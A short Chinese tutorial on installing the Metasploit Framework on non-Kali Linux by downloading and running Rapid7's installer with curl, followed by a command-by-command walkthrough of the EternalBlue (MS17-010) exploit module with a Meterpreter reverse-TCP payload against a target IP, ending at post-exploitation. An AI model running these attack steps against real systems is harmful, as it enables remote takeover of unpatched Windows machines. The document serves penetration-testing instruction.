以下是非kali的Linux下安裝MSF框架
一鍵安裝
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall adduser msf #添加msf用戶 su msf #切換到msf用戶 cd /opt/metasploit-framework/bin #切換到msf所在的目錄 ./msfconsole #以后啟動msfconsole,都切換到msf用戶下啟動,這樣會同步數據庫。如果使用root用戶啟動的話,不會同步數據庫 也可以將msfconsole加入到執行目錄下,這樣在任何目錄直接msfconsole就可以了 ln -s /opt/metasploit-framework/bin/msfconsole /usr/bin/msfconsole #備注: #初次運行msf會創建數據庫,但是msf默認使用的PostgreSQL數據庫不能與root用戶關聯,這也這也就是需要新建用戶msf來運行metasploit的原因所在。如果你一不小心手一抖,初次運行是在root用戶下,請使用 msfdb reinit 命令,然后使用非root用戶初始化數據庫。 MSF后期的升級:msfupdate
使用方法(永恆之藍為例):
-
進入框架:msfconsole
-
使用search命令查找相關漏洞: search ms17-010
-
使用use進入模塊: use exploit/windows/smb/ms17_010_eternalblue
-
使用info查看模塊信息: info
-
設置攻擊載荷:set payload windows/x64/meterpreter/reverse_tcp
-
查看模塊需要配置的參數:show options
-
設置參數:set RHOST 192.168.2.123(目標IP)
-
攻擊:exploit / run
-
后滲透階段